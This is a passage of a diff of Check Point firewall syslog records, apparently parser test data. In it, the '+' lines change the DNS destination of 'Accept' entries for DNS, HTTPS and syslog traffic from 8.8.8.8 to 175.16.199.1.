service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38710"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37101"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37101"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58828"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.166.113.188"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38082"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e051,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; 
src:"192.168.1.100"] -<134>1 2020-03-29T17:52:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e051,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504337"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37064"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e051,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504337"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55344"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37064"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504338"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60561"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e052,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36894"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e054,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47813"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40621"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58545"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59370"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47813"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40621"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58545"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59370"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"151.101.37.108"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37970"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37678"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:20Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e054,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504340"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37678"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:52:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e055,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"32776"; service:"443"; service_id:"https"; 
